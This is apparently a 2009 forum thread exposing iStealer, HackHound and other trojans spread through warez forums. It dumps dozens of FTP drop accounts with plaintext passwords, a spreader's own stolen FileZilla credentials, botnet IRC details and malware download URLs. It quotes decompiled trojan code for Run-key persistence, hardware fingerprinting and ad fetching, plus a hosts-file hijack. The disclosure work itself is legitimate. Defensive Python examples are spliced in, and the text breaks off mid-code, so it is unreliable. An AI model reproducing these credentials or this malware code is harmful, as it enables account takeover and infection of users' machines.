iStealer and HackHound Stealer FTP accounts and PHP Logger pages

']['€AM€LiT€ Forum - News, Reports and Alerts

 
Vektor, 2009-06-27 16:39:30

The following accounts are currently used by iStealer trojans, HackHound Stealer trojans and keyloggers that are bound to other executable files linked from various forums and blogs.

  1. FTP accounts:


    Many of these accounts still work, and in some cases you don't have the right to delete files from them. Use FTP Log Cleaner if you want to overwrite / delete all logs.

  2. PHP Logger pages:

  3. E-mail accounts:

Vektor, 2009-07-08 21:49:04

More trojan FTPs, PHP logger pages and PPI trojan hosts:

Vektor, 2009-07-13 21:44:29

I've also found a fake codec on many forums (example: rapidbyte.org, poster: qwerty420) written in AutoIt, and I decompiled it. The trojan downloads a list of ads and possible update links from http://www.r2514124a.info/0/t.binx.php?hid=$HARDWAREID

$HARDWAREID wrote:
; Hardware fingerprint sent to the update/ad server as the "hid" parameter.
; _COMPUTERGETOSS / _COMPUTERGETBIOS / _COMPUTERGETNETWORKCARDS /
; _COMPUTERGETPROCESSORS are the CompInfo.au3 UDF's WMI wrappers; MD5() is a
; UDF not included in this excerpt (AutoIt has no built-in MD5). The field
; meanings below follow the decompiled variable names.
Func HARDWAREID()
    Local $_OS, $_BIOS, $_NET, $_PRO
    _COMPUTERGETOSS($_OS)             ; 2D array of operating-system properties
    _COMPUTERGETBIOS($_BIOS)          ; BIOS properties
    _COMPUTERGETNETWORKCARDS($_NET)   ; network adapter properties
    _COMPUTERGETPROCESSORS($_PRO)     ; queried but never used in the hash
    $SERIAL = $_OS[1][46]             ; OS serial number
    $BIOS_VERSION = $_BIOS[1][24]     ; BIOS version string
    $MAC = $_NET[1][15]               ; MAC address of the first adapter
    Return MD5($SERIAL & $BIOS_VERSION & $MAC)   ; hid = MD5(serial + BIOS version + MAC)
EndFunc


Quote:
; Installation: self-copy to %AppData%, Run-key persistence, then affiliate
; check-in. $CONTROL_SAVE, GETAFFILIATEID() and GIVECREDIT() are defined
; elsewhere in the decompiled script.
Func INSTALL()
    ; copy itself to %AppData%\svchost.exe (third argument 1 = overwrite) ...
    $COPY = FileCopy(@ScriptFullPath, @AppDataDir & "\svchost.exe", 1)
    ; ... and open a read handle on the copy that is never closed
    FileOpen(@AppDataDir & "\svchost.exe", 0)
    ; HKLM\...\Run value "*svchostBoot" pointing at the copy; the "*" prefix is
    ; the convention Windows documents for RunOnce entries that should also run
    ; in Safe Mode
    $REG = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "*svchostBoot", "REG_SZ", '"' & @AppDataDir & '\svchost.exe"')
    ; first run only (the persisted copy is named svchost.exe and skips this):
    ; record the affiliate id in save.ini and report the install for PPI credit
    If @ScriptName <> "svchost.exe" Then
        $A = GETAFFILIATEID()
        IniWrite($CONTROL_SAVE & "\save.ini", "stat", "credit", "False")
        IniWrite($CONTROL_SAVE & "\save.ini", "stat", "a", $A[1])
        IniWrite($CONTROL_SAVE & "\save.ini", "stat", "s", $A[2])
        GIVECREDIT($COPY, $REG)
    EndIf
EndFunc


Quote:
; Main loop of the persisted copy: every $AD_DELAY ms read the ad-controller
; URL from control.ini, fetch a URL from it and open that URL in the default
; browser (pay-per-click traffic). $TAD, $AD_DELAY, $VERSION, $CONTROL_SAVE and
; TIME() are set elsewhere in the script; _INETGETSOURCE is from INet.au3 and
; _RUNDOS from Process.au3.
While 1
    Sleep(30)
    If TimerDiff($TAD) > $AD_DELAY Then
        $AD_CONTROL = IniRead($CONTROL_SAVE & "\control.ini", "ads", "url", "")
        If StringLeft($AD_CONTROL, 4) = "http" Then
            ; GET <url>?version=..&name=..&_=<time>; the response body is the URL to open
            $AD_URL = _INETGETSOURCE($AD_CONTROL & "?version=" & $VERSION & "&name=" & @ScriptName & "&_=" & TIME())
            If Not @error And StringLeft($AD_URL, 4) = "http" Then
                _RUNDOS("start " & $AD_URL)   ; "start <url>" opens it in the default browser
            EndIf
        EndIf
        ; re-read the delay (minutes, default 40) and convert to milliseconds
        $AD_DELAY = IniRead($CONTROL_SAVE & "\control.ini", "ads", "delay", "40")
        $AD_DELAY = 1000 * 60 * $AD_DELAY
        $TAD = TimerInit()
    EndIf
WEnd   ; loop terminator, missing from the quoted excerpt
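A triage check for the persistence that the decompiled INSTALL() routine sets up, as an added example (written for this page in Python; it is not the poster's tooling and not code from the trojan). It flags Run-key entries whose value name carries the "*" prefix, whose image borrows a Windows system binary name but runs from outside the system directories, or which are machine-wide (HKLM) yet point into a user profile path. The sample entries, the binary-name list and the path markers are constructed for this example; live_entries() reads the real keys only when run on Windows.

```python
"""Run-key autostart triage (added example; models the persistence in the
decompiled dropper above: HKLM\\...\\Run "*svchostBoot" -> %AppData%\\svchost.exe)."""
import ntpath
import os
import sys
from dataclasses import dataclass
from typing import Dict, List, Optional

# Windows system binary names that droppers like to borrow (svchost.exe is the
# one in the post; the others are assumed additions for this example).
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_PATH_MARKERS = ("\\appdata\\", "\\users\\", "\\documents and settings\\", "\\temp\\")


@dataclass
class RunEntry:
    hive: str      # "HKLM" or "HKCU"
    name: str      # value name, e.g. "*svchostBoot"
    command: str   # value data, e.g. '"C:\\...\\svchost.exe"'


def image_path(command: str) -> str:
    """Executable path from a Run-key command line (quoted, or the first token)."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def findings(entry: RunEntry) -> List[str]:
    """Reasons an entry looks suspicious; an empty list means nothing was flagged."""
    path = os.path.expandvars(image_path(entry.command)).lower()
    base = ntpath.basename(path)   # ntpath: the data is Windows paths even on a Linux analyst box
    reasons = []
    if entry.name.startswith("*"):
        reasons.append("value name has the '*' prefix (entry is also processed in Safe Mode)")
    if base in SYSTEM_BINARY_NAMES and not path.startswith(SYSTEM_DIRS):
        reasons.append(f"{base} launched from outside the Windows system directories")
    if entry.hive == "HKLM" and any(m in path for m in USER_PATH_MARKERS):
        reasons.append("machine-wide autostart pointing into a user-writable profile path")
    return reasons


def live_entries() -> List[RunEntry]:
    """Enumerate the HKLM and HKCU Run keys on a Windows host; [] elsewhere."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    for hive_name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE), ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            key = winreg.OpenKey(hive, r"Software\Microsoft\Windows\CurrentVersion\Run")
        except OSError:
            continue
        with key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:   # no more values
                    break
                entries.append(RunEntry(hive_name, name, str(data)))
                index += 1
    return entries


# Constructed sample: the post's persistence entry next to two benign ones.
SAMPLE_ENTRIES = [
    RunEntry("HKLM", "*svchostBoot", r'"C:\Documents and Settings\victim\Application Data\svchost.exe"'),
    RunEntry("HKLM", "SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    RunEntry("HKCU", "OneDrive", r'"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]


def triage(entries: Optional[List[RunEntry]] = None) -> Dict[str, List[str]]:
    """Map 'HIVE\\name' -> reasons for every flagged entry (sample data by default)."""
    entries = SAMPLE_ENTRIES if entries is None else entries
    return {f"{e.hive}\\{e.name}": r for e in entries if (r := findings(e))}


if __name__ == "__main__":
    # on Windows this walks the real keys; elsewhere it falls back to the sample
    for key, reasons in triage(live_entries() or None).items():
        print(key, *reasons, sep="\n    ")
```

Only the "*svchostBoot" entry trips all three checks; the benign entries produce no findings. The checks are deliberately path-based, so they work just as well on a registry hive exported from an infected box as on the live machine.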
Vektor, 2009-07-17 21:06:42

Vektor, 2009-07-25 11:39:49

  • FTP accounts:
  • PHP loggers:
  • E-mails and e-mail accounts:
  • BiFrost servers:
  • Poison Ivy servers:

Vektor, 2009-08-01 02:25:24

    • FTP accounts used by trojans posted on public forums:
      • ftp://ftp.drivehq.com user: usechange password: manal20
        Source forum: http://warezscene.org , user: hideuser
      • ftp://muhaimin11.justfree.com user: muhaimin11 password: justvip
        Source forum: http://warezscene.org , user: muhaimin11
      • ftp://ftp.drivehq.com/My Documents user: myers97 password: halloween
        Source forum: http://warezscene.org , user: myers97
      • ftp://ftp.rapidsharze.com user: rockstar password: ifucktheworld
        Source forum: http://warezscene.org , user: shadeslader
      • ftp://82.197.131.52 user: tupact_logs password: 9Ge71Nb4by
        Source forum: http://warezscene.org , user: sigma6
      • ftp://ftp.drivehq.com user: aidenunder password: 00757757
        Source forum: http://warezscene.org , user: xxxsnoopyxxx
      • ftp://ftp.drivehq.com user: randyrkofu password: bhenchod
        Source forum: http://warezscene.org , user: dxwasim
      • ftp://ftp.drivehq.com user: tanpa.kekasih password: ongkek
        Source forum: http://warezscene.org , user: Bill610051
      • ftp://93.174.93.130 user: fusionpa password: uy32O33o7a
        Source forum: http://warez-bb.org , user: jaymm422
        He is the owner of fusionpassez.com; this is the FTP account for his forum (found in an .exe file infected with iStealer). This trojan spreader has the habit most trojan spreaders have: uploading the log file with their own passwords to all the FTPs used by the trojans they post on public forums.
        ftp.fussionpasses.com-ftp_log wrote:
        Tue Jul 28 03:06:32 2009 0 124.190.93.163 7762 /home/fusionpa/DESKTOP_270709_1555.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:32 2009 0 124.190.93.163 353 /home/fusionpa/AD-DE7FCA454048_280709_0821.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:33 2009 0 124.190.93.163 3565 /home/fusionpa/LASTXP_280709_0019.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:33 2009 0 124.190.93.163 358 /home/fusionpa/LIFEBOOK-3BA884_270709_2226.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:34 2009 0 124.190.93.163 485 /home/fusionpa/MAIN_270709_1608.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:34 2009 0 124.190.93.163 1659 /home/fusionpa/MYM-TROTTERS_270709_1430.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:35 2009 0 124.190.93.163 426 /home/fusionpa/STARGATE_270709_2348.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:35 2009 0 124.190.93.163 477 /home/fusionpa/USER_270709_2234.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:17:45 2009 0 76.204.151.233 17324 /home/fusionpa/public_html/archive/index.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:22:48 2009 0 76.204.151.233 16724 /home/fusionpa/public_html/includes/functions_digest.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:23:07 2009 0 76.204.151.233 13882 /home/fusionpa/public_html/includes/functions_forumdisplay.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:23:20 2009 0 76.204.151.233 55722 /home/fusionpa/public_html/includes/functions_newpost.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:23:59 2009 0 76.204.151.233 55062 /home/fusionpa/public_html/clientscript/vbulletin_textedit.js a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:34:28 2009 0 76.204.151.233 456 /home/fusionpa/public_html/clientscript/yui/dev-readme.txt a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 04:07:41 2009 1 94.23.114.104 11115 /home/fusionpa/public_html/includes/visionscripts/psionic_hide/global_start.php a _ i r fusionpa ftp 1 * c

        Of course, "jay crilla" tested iStealers on himself and uploaded his log to all his FTP accounts.
        JAYCRILL_B05AD8_.txt wrote:
        ============================
                 File Zilla         
        ============================
        -------------------------
        Host:jaymm422.free-site-host.com
        Username:jaymm422
        Password:worthless
        -------------------------
        Host:freegameproject.at.ua
        Username:2freegameproject
        Password:postal2
        -------------------------
        Host:worthless.freewebhostx.com
        Username:worthless
        Password:worthless422
        -------------------------
        Host:jaymm422.blackapplehost.com
        Username:jaymm422
        Password:dank8091
        -------------------------
        Host:jaymm422.netau.net
        Username:a6738323
        Password:worthless1
        -------------------------

        All these accounts are currently used by iStealer trojans (FTP version and PHP Logger version).
      • ftp://193.92.33.194/httpdocs/logs/ user: rokasftp password: Lsn7U%Tg#E
        Source forum: http://warez-bb.org , user: heavenly war
      • ftp://ftp.testme.ezeserv.com user: vox@testme.ezeserv.com password: vox
        Source forum: http://warez-bb.org , user: tAAlz
      • ftp://ftp.wsuploads.info user: Hacker@wsuploads.info password: uevbs73
        ftp://ftp.wsbomb.nxserve.net user: logs@wsbomb.nxserve.net password: shammi
        Source forum: http://warezforum.info , user: jack*
        Files are bound with 2 trojans, each trojan with its own FTP account.
      • ftp://ftp.deaglegames.com user: caneone password: Alex4868
        Source forum: http://warezforum.info , user: lildegregs22
        Another trojan spreader using the FTP for his websites in iStealer trojans. Google says that his website can "harm your computer". Well... what was on his FTP could have caused harm to your eyes. BTW, his Poison Ivy server: caneone1.no-ip.biz:15963.
      • ftp://ftp.drivehq.com user: SudaniZ password: hacker4ever
        Source forum: http://warezforum.info , user: RainBow96
      • ftp://ftp.drivehq.com user: philk3393 password: motorola99
        Source forum: http://warez-bb.org , user: aldelorien
      • ftp://Files9.cyberlynk.net user: viclogs password: viclogs
        Source forum: http://warez-bb.org , user: dr.indian
        Another dotCrap extractor of Nirsoft "tools" which, of course, crashes on most systems before sending anything to the FTP (compiled: C:\Programme\Microsoft Visual Studio\VB98\sample\Buts LiteStealer v.1\Projekt1.vbp). But that's not a problem: the trojan spreader also bound an iStealer that uses the same account.
        XLWAO.exe wrote:
        Scene-CoderZ LS c0ded by w0red!
        [Daten]
        1-:-Files9.cyberlynk.net-:-viclogs-:-viclogs-:--:-
        1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-0-:-
        0-:-Error 42342-:-An Error occured. The program must be closed!-:-Normal-:-0-:-0-:-g34tg3gerrgfbv-:--:-1-:-
        0-:-0-:-0-:-0-:-1-:-1-:-
        0-:-0-:-minut-:-
        0-:-dltxt-:-1-:-
        [Daten]

      • ftp://ftp.drivehq.com/My Music user: ghyll password: lancej
        Source forum: http://warez-bb.org , user: LostArch
        Some plain text from the stealer's .exe file (which is another dotCrap extractor of Nirsoft tools):
        Temp\2.exe wrote:
        @@NN@@ftp.drivehq.com@@NN@@ghyll@@NN@@lancej@@NN@@10@@NN@@My Music@@NN@@true@@NN@@false|@@NN@@false@@NN@@active

      • ftp://ftp.desirockerz.info user: hhstealer@desirockerz.info password: james007bond
        Source forum: http://warez-bb.org , user: guzar
      • ftp://haz-one.justfree.com user: haz-one password: 0139940751
        Source forum: http://warez-bb.org , user: haz-one
      • ftp://patta.justfree.com user: patta password: patta
        Source forum: http://warez-bb.org , user: lummy
      • ftp://ftp.drivehq.com user: satjoy password: sat456321
        Source forum: http://warez-bb.org , user: Mr.mohamed
      • ftp://ftp.drivehq.com user: mudassar0529 password: sadafvuskp
        Source forum: http://warez-bb.org , user: purpule lover
      • ftp://ftp.conanthum.info user: cyber95@inter-defi.com password: 666666
        Source forum: http://warez-bb.org , user: sate.padang
      • ftp://brijendrasial.freehostia.com user: brisia7 password: lucky2
        Source forum: http://warez-bb.org , user: sialbrijendra (compiled: C:\Documents and Settings\iZac\Desktop\AuraStomper\Reveal\Project1.vbp)
      • ftp://ftp.drivehq.com user: trythisone password: nukeblast
        Source forum: http://warez-bb.org , user: a7081a
      • ftp://mina.hostei.com user: a3982170 password: B7ZJwWN558
        Source forum: http://warez-bb.org , user: aadukiki
      • ftp://ftp.rapidshare.co.cc user: rapidcc password: 0100209631lmao
        Source forum: http://warez-bb.org , user: Gilon
      • ftp://ftp.drivehq.com user: mriran password: ftp123456789
        Source forum: http://warez-bb.org , user: loglives
      • ftp://testing.bplaced.net user: testing password: testing
        Source forum: http://warez-bb.org , user: owleye
      • ftp://games2.nsw.ausnetservers.com.au/home/scrimzon user: scrimzon password: #Ql29CYK1;CX
        Source forum: http://warez-bb.org , user: SlixX123698741
      • ftp://bz-web.de user: web4f1 password: zNc0Xgss
        Source forum: http://warez-bb.org , user: vossyger
        Local path to the trojan spreader's "project": C:\Programme\Microsoft Visual Studio\VB98\steam.vbp. You must have Steam installed or else it crashes.
      • ftp://ftp.drivehq.com user: sparkliquid password: 890908
        Source forum: http://warez-bb.org , user: sparkliquid
        Ardamax keylogger.
      • ftp://ftp.drivehq.com user: whatishappening password: whatishappening
        Source forum: http://warezscene.org , user: The uploader
        Ardamax keylogger.
      • ftp://madafaka.0catch.com user: madafaka.0catch.com password: samsung
        Source forum: http://warezscene.org , users: Pirated and sandiyo
        This trojan extracts 2 files, M5NH4CK3R.EXE (Ardamax keylogger) and MSNSPY.exe (AutoIt program).
        Code:
        ; Decoy GUI loop of MSNSPY.exe (needs #include <GUIConstantsEx.au3> for
        ; $GUI_EVENT_CLOSE). The Start button only animates a progress bar and
        ; German status labels; nothing is ever connected or transferred.
        ; $progbar, $buttonstart and $buttonstop are created before the loop.
        While 1
            $msg = GUIGetMsg()
            Select
                Case $msg = $GUI_EVENT_CLOSE
                    ExitLoop
                Case $msg = $buttonstart
                    GUICtrlSetData($progbar, 1)
                    GUICtrlCreateLabel("Initialisiere...", 120, 50)             ; "Initialising..."
                    Sleep(1000)
                    GUICtrlSetData($progbar, 10)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 15)
                    GUICtrlCreateLabel("Verbinde mit Server...", 120, 65)       ; "Connecting to server..."
                    Sleep(2500)
                    GUICtrlSetData($progbar, 20)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 40)
                    GUICtrlCreateLabel("Daten werden uebertragen...", 120, 80)  ; "Transferring data..."
                    Sleep(1000)
                    GUICtrlSetData($progbar, 45)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 56)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 60)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 65)
                    GUICtrlCreateLabel("Verbinde zu Chatpartner...", 120, 95)   ; "Connecting to chat partner..."
                    Sleep(1000)
                    GUICtrlSetData($progbar, 70)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 75)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 75)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 75)
                    ; fake failure: the bar runs back down and the user is sent to "support"
                    GUICtrlCreateLabel("!!unknown error!!", 120, 110)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 65)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 50)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 10)
                    Sleep(1000)
                    GUICtrlSetData($progbar, 0)
                    GUICtrlCreateLabel("   Please report to support@msnspy.biz", 110, 125)
                    Sleep(1000)
                Case $msg = $buttonstop
                    ; the Stop button does nothing
            EndSelect
        WEnd

      • ftp://ftp.t35.com user: jesuschristinmyass.t35.com password: voide123
        Source forum: http://warez-bb.org , user: burNzw
      • ftp://applications.justfree.com user: applications password: 24091992
        Source forum: http://warez-bb.org , user: Mposter
      • ftp://gamergalaxy2.blackapplehost.com user: gamergalaxy2 password: 321098
        Source forum: http://warez-bb.org , user: SimeCro
      • ftp://bbwarez.servegame.org user: bbwarez password: admin
        Source forum: http://warez-bb.org , user: tomahawk_1987
      • ftp://76.73.37.130 user: sayem password: 123456
        Source forum: http://warez-bb.org , user: ViRtUaloRd HacKeR (without_clone.exe)
      • ftp://belmacha.justfree.com user: belmacha password: belma123
        Source forum: http://warez-bb.org , user: xillion


    • PHP loggers:


    • E-mail accounts:


    • Other trojans:
      • FaceBook Freezer.exe
        Source forum: http://warez-bb.org , user: m0n
        WinRAR SFX which overwrites %systemroot%\drivers\etc\hosts with this file:
        Code:
        # HACK3R

        127.0.0.1       localhost

        127.0.0.1       www.facebook.com
        127.0.0.1       facebook.com

        127.0.0.1       www.aol.com
        127.0.0.1       aol.com

        127.0.0.1       www.hotmail.com
        127.0.0.1       hotmail.com

        127.0.0.1       www.yahoo.com
        127.0.0.1       yahoo.com

        127.0.0.1       www.gmail.com
        127.0.0.1       gmail.com

        127.0.0.1       login.live.com
        127.0.0.1       mail.live.com
        127.0.0.1       login.yahoo.com

        127.0.0.1       www.rapidshare.com
        127.0.0.1       rapidshare.com

        127.0.0.1       www.cyberserg.com
        127.0.0.1       cyberserg.com

        127.0.0.1       www.albwzone.com
        127.0.0.1       albwzone.com

        Code:
        ;The comment below contains SFX script commands

        Path=C:\windows\system32\drivers\etc\
        SavePath
        Silent=1
        Overwrite=1

      • file.exe
        Source forum: http://warez-bb.org , user: r0r
        This trojan downloads and executes anything that can be found at any of these addresses: http://82.98.235.70/443, http://65.243.103.80/80
      • SSM.exe (compiled: C:\Users\Bodeezy\Desktop\IMPROTOOLS\SSM UPDATE\SSM\SSM\obj\Release\SSM.pdb )
        Source forum: http://warez-bb.org , user: billuk3
        I posted about this trojan before; it is an encrypted dotCRAP program which calls PPC links (link list source: http://www.itsrunbytools.com/s/WE/0035/info.php), and it has a GUI which is normally not shown. However, there are ways to make it visible. Screenshot:
        http://img204.imageshack.us/img204/2748/dotcrap.jpg
      • svhost.exe , lsaas.exe
        Source forums: http://warezforum.info, http://wrzboard.org user: talkativr4, http://warezvb.org user: dancerick
        This trojan is usually extracted and executed by an NSIS installer, and it is an NSIS installer itself which executes "net stop WSCSVC", then downloads and executes a file from http://zaupdt.com/adminpriv/ap.
        http://zaupdt.com/adminpriv/ap redirects to http://tinyurl.com/kjbqgd/, which redirects to http://hosting-for-free.info/uploads/1247667284.exe (VirusTotal) (for more samples, reports with earnings, logs, screenshots, etc. visit the rapidtrojan website)

        1247667284.exe is a dropper for cfmon.exe (rootkit) and service.exe (downloader)

        Service.exe has these hardcoded download links and paths (it will download, save and execute everything):
        • http://chifcwbifg.com/progs/wirfjaosw/eocptxyc.php?adv=adv797 (195.2.253.241 at the time I checked it)
        • http://dhfpvnxgfw.net/progs/wirfjaosw/eocptxyc.php?adv=adv797 (195.2.253.243 at the time I checked it)
        • http://chifcwbifg.com/progs/wirfjaosw/xhuyph.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/xhuyph.php
          c:\pnhipken.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/ekkofxb.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/ekkofxb.php
          c:\gjdnse.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/slvanev.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/slvanev.php
          c:\khquid.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/zwjbfj.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/zwjbfj.php
          c:\fhntweri.exe (dropper for bcfaadfdadacf.dll, which creates a remote thread in Winlogon.exe that gets a list with instructions from wl.genseck.com)
        • http://chifcwbifg.com/progs/wirfjaosw/udvvmquz.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/udvvmquz.php
          c:\rlmnkvyl.exe (rootkit installer for aec.sys)
        • http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/isgtklct.php
          c:\vfjmbvbg.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/nxkoyp
          http://dhfpvnxgfw.net/progs/wirfjaosw/nxkoyp
        • http://dhfpvnxgfw.net/progs/wirfjaosw/
          http://chifcwbifg.com/progs/wirfjaosw/
        • http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
        • http://chifcwbifg.com/progs/wirfjaosw/nxkoyp
        • http://chifcwbifg.com/progs/wirfjaosw/xhuyph.php
        • http://chifcwbifg.com/progs/wirfjaosw/ekkofxb.php
        • http://chifcwbifg.com/progs/wirfjaosw/slvanev.php
        • http://chifcwbifg.com/progs/wirfjaosw/zwjbfj.php
        • http://chifcwbifg.com/progs/wirfjaosw/udvvmquz.php
        • http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
        • http://chifcwbifg.com/progs/wirfjaosw/eocptxyc.php?adv=adv797


        Received configuration file from wl.genseck.com (206.161.205.220):
        Code:
        r_startup_delay=400
        config_update_period=84600
        config_url_0=http://wl.genseck.com/v306/logo.jpg
        config_url_1=http://wl.igoesto.com/v306/logo.jpg
        config_url_2=http://wl.remiusa.com/v306/logo.jpg
        config_url_3=http://209.9.171.251:43543/wl/v306/logo.jpg
        config_url_count=4
        config_url_tries_0=6
        config_url_tries_1=4
        config_url_tries_2=2
        config_url_tries_3=1
        config_version=1
        create_time=2009-07-15 18:27:36:062
        id=5bc0f6a95ad5361fd397a445d2a68cf4
        last_config_update=1247672057
        wmid=cl991


        The file logo.jpg is a base64-encoded encrypted configuration file (encrypted, then encoded to base64).

        http://chifcwbifg.com/progs/wirfjaosw/nxkoyp - dropper trojan, which downloads and executes files from these addresses:
        • http://chifcwbifg.com/uniq.php?id=1759469761&p=0
          text: ok
        • http://dhfpvnxgfw.net/aasuper0.php
          c:\imkmpuqp.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://dhfpvnxgfw.net/aasuper1.php
          c:\tjwupb.exe
        • http://dhfpvnxgfw.net/aasuper2.php
          c:\blxwl.exe - WinRAR SFX, extracts and executes install.exe, which is a rootkit installer (glaide32.sys).
        • http://dhfpvnxgfw.net/aasuper3.php
          c:\poqj.exe - downloads an encrypted configuration file from http://iframr.com/plist.php?uid=a5c7124324cf02c4e03542310d0b3881 and 2 .exe files from http://download.microsoft-update-center.com:88/files/db.exe (compiled: D:\Documents and Settings\Administrator\Lb\dailybucks}\mycc\Project1.vbp) and http://installmoney.com/svchost.exe (cabinet SFX which extracts mshost.exe and mshost1.exe).

        More trojans are downloaded, like installscash.exe, luxecash.exe, dailybucks.exe, socks.exe, ppcmania.exe, bot.exe, calc.exe, ebatoria.exe, 242.exe, install_fafbf.exe etc.
        Yep, looks like a successor of the "XP Antivirus" trojan.
      • vsutil.exe
        Source forum: http://warez-bb.org , users: famafair1 , stoptillu69
        An NSIS installer like the one above, but the download address is different; this one downloads from http://zaupdt.com/adminpriv/ap
        http://zaupdate.com/security/en-us/vsmon -> http://tinyurl.com/nhdad9 -> http://anonymouse.org/cgi-bin/anon-www.cgi/http://tinyurl.com/m97nae/ -> http://anonymouse.org/cgi-bin/anon-www.cgi/http://z1.przeklej.pl/przo1740/0db7c2c5002285d84a7226f3/belgium8320.jpg (a renamed .exe)
      • mscoef.exe (compiled: D:\no-ip\nepal1.hopto.org\ri0t[v5] with rar,udp,ssyn\ri0t[v5] with rar,udp,ssyn\Debug\ri0t.pdb )
        Source forum: http://warezscene.org , user: hellomoto1234
        IRC botnet server: nepal.no-ip.biz (chat.smokeynet.org), channel #platform, key: t3sting, prefix for bots: [s0ft]*
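The FTP transfer log quoted in the fusionpassez.com entry above is in xferlog format (the wu-ftpd/ProFTPD TransferLog). As an added example (written for this page, not the poster's tooling), this parser splits the records and flags the two things that log shows: an operator pulling stealer drop files named <HOST>_DDMMYY_HHMM.html, and PHP files uploaded into a web root. The two checks and the field comments are this example's; the sample records are four lines copied from the quoted log.

```python
"""xferlog parser with two hunting checks (added example, not from the post)."""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, NamedTuple


class Xfer(NamedTuple):
    when: str          # "Tue Jul 28 03:06:32 2009"
    secs: int          # transfer time in seconds
    host: str          # remote host
    size: int          # bytes transferred
    path: str          # server-side path
    kind: str          # a = ascii, b = binary
    action: str        # C/U/T = compressed/uncompressed/tar, _ = none
    direction: str     # o = outgoing (download), i = incoming (upload), d = delete (ProFTPD)
    mode: str          # a = anonymous, g = guest, r = real user
    user: str
    service: str       # "ftp"
    auth: str          # 0 = none, 1 = RFC 931
    auth_user: str     # "*" when not available
    status: str        # c = complete, i = incomplete


# Stealer drop files in the quoted log: <HOST>_DDMMYY_HHMM.html
DROP_NAME = re.compile(r"^[A-Za-z0-9-]+_\d{6}_\d{4}\.html$")


def parse_xferlog_line(line: str) -> Xfer:
    """The nine trailing fields never contain spaces, so split from the right
    first; the path (which may contain spaces) is whatever is left in the head."""
    head, *tail = line.strip().rsplit(maxsplit=9)
    fields = head.split(maxsplit=8) if len(tail) == 9 else []
    if len(fields) != 9:
        raise ValueError(f"not an xferlog record: {line!r}")
    when = " ".join(fields[:5])
    return Xfer(when, int(fields[5]), fields[6], int(fields[7]), fields[8], *tail)


def analyse(lines: Iterable[str]) -> Dict[str, object]:
    """Drop-file pickups, PHP uploads into public_html, and per-host direction counts."""
    recs = [parse_xferlog_line(l) for l in lines if l.strip()]
    drop_pickups = [(r.host, r.path) for r in recs
                    if r.direction == "o" and DROP_NAME.match(r.path.rsplit("/", 1)[-1])]
    php_uploads = [(r.host, r.user, r.path) for r in recs
                   if r.direction == "i" and r.path.endswith(".php") and "/public_html/" in r.path]
    by_host: Dict[str, Counter] = defaultdict(Counter)
    for r in recs:
        by_host[r.host][r.direction] += 1
    return {"drop_pickups": drop_pickups, "php_uploads": php_uploads,
            "by_host": {h: dict(c) for h, c in by_host.items()}}


# Four records copied from the log quoted in the post.
SAMPLE_XFERLOG = """\
Tue Jul 28 03:06:32 2009 0 124.190.93.163 7762 /home/fusionpa/DESKTOP_270709_1555.html a _ o r fusionpa ftp 1 * c
Tue Jul 28 03:06:32 2009 0 124.190.93.163 353 /home/fusionpa/AD-DE7FCA454048_280709_0821.html a _ o r fusionpa ftp 1 * c
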